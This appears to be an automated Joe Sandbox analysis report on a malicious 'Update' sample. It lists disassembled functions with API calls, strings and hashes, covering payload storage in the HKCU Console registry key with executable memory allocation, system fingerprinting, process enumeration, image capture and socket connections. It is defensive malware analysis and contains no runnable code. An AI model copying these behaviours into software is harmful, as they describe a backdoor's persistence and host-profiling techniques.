Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Crypt$BinaryContextParamString$AcquireDecryptDestroyExceptionImportRaiseRelease___std_exception_copy_strlen
String ID: Salt$ed__
API String ID: 1577403515-3701620873
Opcode ID: 0b2a5f7200ba214950dda137b5a6f68e7437a56590f97d15e7885b808d145e63
Instruction ID: 01d7cf4cde2ae0d8558154dcfdf77a8919f5feabe1906ac55aee4f897f0a4eea
Opcode Fuzzy Hash: 0b2a5f7200ba214950dda137b5a6f68e7437a56590f97d15e7885b808d145e63
Instruction Fuzzy Hash: A622B0B2E112189FEB14CFA4CD45BEDBBB5BF45304F148158E405E7780EB759A88CBA1

Function 6CA86720 Relevance: 33.6, APIs: 22, Instructions: 566
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32 ref: 6CA86806
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 6CA8686C
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6CA8688D
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6CA868F6
CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 6CA86921
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6CA8698E
CryptDestroyHash.ADVAPI32(00000000), ref: 6CA86999

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Crypt$Hash$DataParam$AcquireContextCreateDestroy
String ID:
API String ID: 2113037386-0
Opcode ID: d7b1e8fe06a2de00c6f0819e0e323b495997ccd4b8b7514ea157f84a4019d66f
Instruction ID: 8a607758fb74788eb96d1462ef6c85ab12cdb72c1d0def97b634852f8d6b7546
Opcode Fuzzy Hash: d7b1e8fe06a2de00c6f0819e0e323b495997ccd4b8b7514ea157f84a4019d66f
Instruction Fuzzy Hash: F52269B2E112189FEF14CFA8CD45BEEBBB5BB49304F148158E405E7740DB759989CBA0

Function 037F80F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 037F8132
lstrcmpiW.KERNEL32(?,A:\), ref: 037F8166
lstrcmpiW.KERNEL32(?,B:\), ref: 037F8176
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037F81A6
lstrlenW.KERNEL32(?), ref: 037F81B7
__wcsnicmp.LIBCMT ref: 037F81CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 037F8204
lstrcpyW.KERNEL32(?,?), ref: 037F8228
lstrcatW.KERNEL32(?,00000000), ref: 037F8233

Strings

B:\, xrefs: 037F8170
A:\, xrefs: 037F8160

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 950920757-1009255891
Opcode ID: c002867f02712bc0dd86cf9387ddb2ba29077fac5f7ee52597c288ece76a1900
Instruction ID: c4ef4e80a07c769a258b7a824dbf3b7b7cd7527a057e42a8731d8890624ce533
Opcode Fuzzy Hash: c002867f02712bc0dd86cf9387ddb2ba29077fac5f7ee52597c288ece76a1900
Instruction Fuzzy Hash: FE419772A01618EFDB20EF64DD84AAEB37CFF44710F0445D9DA1AA7240EB74EA05CB95

Function 6CA92576 Relevance: 18.7, APIs: 6, Strings: 4, Instructions: 1207COMMON

Download Yara Rule

Strings

6, xrefs: 6CA9274B
, xrefs: 6CA93F10
', xrefs: 6CA94DC9
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID: $'$jIk$6
API String ID: 0-3404073836
Opcode ID: e04258be32b16905a3b88c41a0a2badc8e1eeb476bc9a8cfe57a55c01292e48e
Instruction ID: 685b0b05808783aa898bbd053e57cab659fe06db78276df118844b3d6285b498
Opcode Fuzzy Hash: e04258be32b16905a3b88c41a0a2badc8e1eeb476bc9a8cfe57a55c01292e48e
Instruction Fuzzy Hash: B1C2BC71D112688BEB24CF68CC957EDBBF2BF46304F148298D449AB691DB715AC8CF81

Function 6CA92638 Relevance: 18.6, APIs: 6, Strings: 4, Instructions: 1140COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA929DC

Strings

6, xrefs: 6CA9274B
, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: $,$jIk$6
API String ID: 4218353326-1611763776
Opcode ID: 5abb027c1b783c1ad9a3ea9b16bbe9298652f2e300fad3c4f09094671ae3eccf
Instruction ID: 64c3ac971c2b684459d4e88d2cb72b5d6cd0be2151149d618b0f7ff07e8e5533
Opcode Fuzzy Hash: 5abb027c1b783c1ad9a3ea9b16bbe9298652f2e300fad3c4f09094671ae3eccf
Instruction Fuzzy Hash: 1EB2BC71D212688BEB24CF68CC957EDBBB2BF45304F148298D449AB691DB715EC8CF81

Function 037F6790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 037F5320: InterlockedDecrement.KERNEL32(00000008), ref: 037F536F
Part of subcall function 037F5320: SysFreeString.OLEAUT32(00000000), ref: 037F5384
Part of subcall function 037F5320: SysAllocString.OLEAUT32(03815148), ref: 037F53D5

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03815148,037F69A4,03815148,00000000,75BF73E0), ref: 037F67F4
GetLastError.KERNEL32 ref: 037F67FE
GetProcessHeap.KERNEL32(00000008,?), ref: 037F6816
HeapAlloc.KERNEL32(00000000), ref: 037F681D
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 037F683F
LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 037F6871
GetLastError.KERNEL32 ref: 037F687B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 037F68E6
HeapFree.KERNEL32(00000000), ref: 037F68ED

Strings

NONE_MAPPED, xrefs: 037F6888

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
String ID: NONE_MAPPED
API String ID: 1317816589-2950899194
Opcode ID: 32e372ffb5c35e19f05acf45f2f6781f46380ae907ef0b8487e22b66a4554250
Instruction ID: eccefb21c4ce2037f1bfd706a77891c5eddbaf8e58fe107976304001da778941
Opcode Fuzzy Hash: 32e372ffb5c35e19f05acf45f2f6781f46380ae907ef0b8487e22b66a4554250
Instruction Fuzzy Hash: 614175B5A00218AFDB20EB64DC48FAEB77DFB85700F0045DCE719A7240DA745A85CF65

Function 037F6C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 037F6C8B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 037F6CAA
_memset.LIBCMT ref: 037F6CE1
GlobalMemoryStatusEx.KERNEL32(?), ref: 037F6CF4
swprintf.LIBCMT ref: 037F6D39
swprintf.LIBCMT ref: 037F6D4C

Strings

:, xrefs: 037F6C80
@, xrefs: 037F6CED
HDD:%d, xrefs: 037F6D2E
%sFree%d Gb , xrefs: 037F6D41

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
String ID: %sFree%d Gb $:$@$HDD:%d
API String ID: 3202570353-3501811827
Opcode ID: f179853291fb7ab5797cc1547490693970f74fffb411d6cddb1ae83984bb3bfe
Instruction ID: 19a3cf06c73a5892069030fb9d2701b5baa80fd9067348201bbf52e4f1907ca1
Opcode Fuzzy Hash: f179853291fb7ab5797cc1547490693970f74fffb411d6cddb1ae83984bb3bfe
Instruction Fuzzy Hash: 7A3161B6E0020C9FDB14DFE9CC45BEEB7B9FB48700F50425DEA1AA7241EA746905CB94

Function 6CA92870 Relevance: 16.8, APIs: 6, Strings: 3, Instructions: 1091COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA929DC

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: $,$jIk
API String ID: 4218353326-2946808363
Opcode ID: f34cf6a45f8b81a015cd7c8fe9c1f01a46c02da81b27f58b060f701db30e872d
Instruction ID: 3241342fa29187d07a44a6c7efed478e255b9185865387cdf98eed4deeddac6b
Opcode Fuzzy Hash: f34cf6a45f8b81a015cd7c8fe9c1f01a46c02da81b27f58b060f701db30e872d
Instruction Fuzzy Hash: 75A2ED71D212688BEB24CF68CC957EDBBB2BF45304F148298D449AB691DB715EC8CF81

Function 6CA92771 Relevance: 16.8, APIs: 6, Strings: 3, Instructions: 1091COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA929DC

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: $,$jIk
API String ID: 4218353326-2946808363
Opcode ID: 9b8412707b1994b36f8924e5f88b1bef4aef14949898191440e8ba863fa60e3d
Instruction ID: 36cf48475b2ba84d9810f27a94c94753bdfc9b5758ef0e772322c4c9241ed4c3
Opcode Fuzzy Hash: 9b8412707b1994b36f8924e5f88b1bef4aef14949898191440e8ba863fa60e3d
Instruction Fuzzy Hash: 29B2DD71D112688BEB24CF28CC957EDBBB2BF45304F158298D449AB691DB715EC8CF81

Function 037F6EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON

Download Yara Rule

APIs

CreateDXGIFactory.DXGI(0381579C,?,4EB10097,74DEDF80,00000000,75BF73E0), ref: 037F6F4A
swprintf.LIBCMT ref: 037F711E
std::_Xinvalid_argument.LIBCPMT ref: 037F71C7

Strings

%s%s %d %d , xrefs: 037F7113
%s%s %d*%d , xrefs: 037F7337
vector<T> too long, xrefs: 037F71C2

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateFactoryXinvalid_argumentstd::_swprintf
String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
API String ID: 3803070356-257307503
Opcode ID: 3e6c4638a247f37235102b937dba837c8bf62610cf689fe7397f59c4cf378814
Instruction ID: d632739f575c0d2e6bb36f0bd7669cc5d649bc8dd96c4a8449af4eef0b4107e6
Opcode Fuzzy Hash: 3e6c4638a247f37235102b937dba837c8bf62610cf689fe7397f59c4cf378814
Instruction Fuzzy Hash: 7AE15471A002659FDF68DE64CC80BEEB3B5BF89740F1446E9DA19A7384D730AE418F91

Function 6CA92A4B Relevance: 15.0, APIs: 5, Strings: 3, Instructions: 998sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA91070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6CA91124
Part of subcall function 6CA91070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA9115F

Sleep.KERNEL32(000000C8), ref: 6CA92B0D
_strlen.LIBCMT ref: 6CA92B53

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AttributesFileIos_base_dtorSleep_strlenstd::ios_base::_
String ID: $,$jIk
API String ID: 3921760320-2946808363
Opcode ID: 1b028ce1c9482a697b45d1a8f65294d9a3816c97f7a3be99ffc3503a99b7f044
Instruction ID: d43ff734e1ad635f77be2825ad0c6bb7defa232b1777dbe7c521441da40cda8d
Opcode Fuzzy Hash: 1b028ce1c9482a697b45d1a8f65294d9a3816c97f7a3be99ffc3503a99b7f044
Instruction Fuzzy Hash: BBA2DC71D112688BEB24CF68CC953EDBBF2BF46304F148298D449AB691DB715EC8CB81

Function 6CA92BC6 Relevance: 13.2, APIs: 3, Strings: 4, Instructions: 933COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA92E9B

Strings

, xrefs: 6CA93E96
,, xrefs: 6CA93D12
SPV, xrefs: 6CA92C18
jIk, xrefs: 6CA93E27

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: $,$SPV$jIk
API String ID: 4218353326-3917736278
Opcode ID: d413b27242cc69eed555b8e6b803980153b01b52832606db2bff45a140ed7b47
Instruction ID: 7855f597d33b4bf8e1895bf330b101cce2a0cf0f75a1c76609a4ad74573787db
Opcode Fuzzy Hash: d413b27242cc69eed555b8e6b803980153b01b52832606db2bff45a140ed7b47
Instruction Fuzzy Hash: D892BC71D112688BEB24CF68C8953EDBBF2BF46304F158298D449AB691DB715EC8CB81

Function 037F6050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037F607C
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 037F6088
Process32FirstW.KERNEL32(00000000,00000000), ref: 037F60B9
Process32NextW.KERNEL32(00000000,0000022C), ref: 037F610F
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 037F6116

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
String ID:
API String ID: 2526126748-0
Opcode ID: e4746fa507987458b0b7841b06f04222a8671a0839929f9c0ae4d3b1cb846ba7
Instruction ID: b0de35aa599f53406f60d9c78a9707f1db93114e11f02eee5c506619b938d06d
Opcode Fuzzy Hash: e4746fa507987458b0b7841b06f04222a8671a0839929f9c0ae4d3b1cb846ba7
Instruction Fuzzy Hash: 2121B531600118AFDB20FF74DC99BEEB3A9FF18320F1446E9DE1A97280EB359A00C650

Function 037F3360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 037F3413
_memmove.LIBCMT ref: 037F34A5

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: e4a44b8ba9cf7b73ba5725c38a944c4cc1f5896fc2cd8922260d4bc0fb7fea26
Instruction ID: cd0c0d072d40e2ececdf4e6d6c0efc2fd8ee34a590cb6dcbc8ce5532614b90be
Opcode Fuzzy Hash: e4a44b8ba9cf7b73ba5725c38a944c4cc1f5896fc2cd8922260d4bc0fb7fea26
Instruction Fuzzy Hash: F851C37A7006059FE711DF69C8C4A7AF7A9FF48214B58866CEA1ACB704DB31F851CB90

Function 100054C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263
registrymemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
_memset.LIBCMT ref: 10005548
RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
RegCloseKey.ADVAPI32(?), ref: 100055B1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 10005605
_memset.LIBCMT ref: 10005669
_memset.LIBCMT ref: 1000568D
_memset.LIBCMT ref: 1000569F
VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
RegCloseKey.KERNEL32(?), ref: 100057CE
Sleep.KERNEL32(00000BB8), ref: 100057FE

Strings

0d3b34577c0a66584d5bdc849e214016, xrefs: 100055BA
9e9e85e05ee16fc372a0c7df6549fbd4, xrefs: 10005528, 1000555D, 100057A6, 100057BE
l, xrefs: 10005644
!jWW, xrefs: 10005630
e, xrefs: 100054DC
Console\0, xrefs: 100054F3, 1000578F
., xrefs: 1000563A
i, xrefs: 10005658
{vU_, xrefs: 10005626
_, xrefs: 1000564E

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
API String ID: 354323817-737951744
Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51

Function 037F9E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9E7B
GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9EFC
GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9F24
GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9F7F
_malloc.LIBCMT ref: 037F9FC0

Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8

_free.LIBCMT ref: 037FA000
GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 037FA028
SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 037FA0B7
GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 037FA112
_free.LIBCMT ref: 037FA134
_memcpy_s.LIBCMT ref: 037FA183
GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 037FA1D0
GdipCreateBitmapFromScan0.GDIPLUS(?,?,03815A78,00022009,?,00000000,?,00000000), ref: 037FA22C
GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 037FA24C
GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 037FA267
GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 037FA274
GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 037FA27B
_free.LIBCMT ref: 037FA296

Strings

&, xrefs: 037F9EE1

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
String ID: &
API String ID: 640422297-3042966939
Opcode ID: 93e53ca529c0e3f3e5548cb9a66fe69b6f8889f23eaec3db7ca880c3e77949e6
Instruction ID: 32061271c0a546814222c3c1467268f47ab9bc8c98ec1ca61696c906c49f62c4
Opcode Fuzzy Hash: 93e53ca529c0e3f3e5548cb9a66fe69b6f8889f23eaec3db7ca880c3e77949e6
Instruction Fuzzy Hash: A8D15FB1A006199FDB60DF55CC84B9AB7B8FF88304F0485A9E70DA7301D734AA85CF69

Function 037F2DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 037F2DBB
InterlockedExchange.KERNEL32(?,00000000), ref: 037F2DC7
timeGetTime.WINMM ref: 037F2DCD
socket.WS2_32(00000002,00000001,00000006), ref: 037F2DFA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 037F2E26
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 037F2E32
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 037F2E51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 037F2E5D
gethostbyname.WS2_32(00000000), ref: 037F2E6B
htons.WS2_32(?), ref: 037F2E8D
connect.WS2_32(?,?,00000010), ref: 037F2EAB

Strings

0u, xrefs: 037F2F1C

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: a76537d5cbf48d22b0f5167ac32665a452231be4fe8b6b08a5178ad73e7b620c
Instruction ID: 8a12dbe3bc98623ea580e8e33a2e6199896717afbb34f62ada6fe292660d047b
Opcode Fuzzy Hash: a76537d5cbf48d22b0f5167ac32665a452231be4fe8b6b08a5178ad73e7b620c
Instruction Fuzzy Hash: 986131B1A40704AFE720EFA4DC45FAAB7BCFF48B10F104559F755AB2D0D6B0A9048B64

Function 10002D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 10002D9B
InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
timeGetTime.WINMM ref: 10002DAD
socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
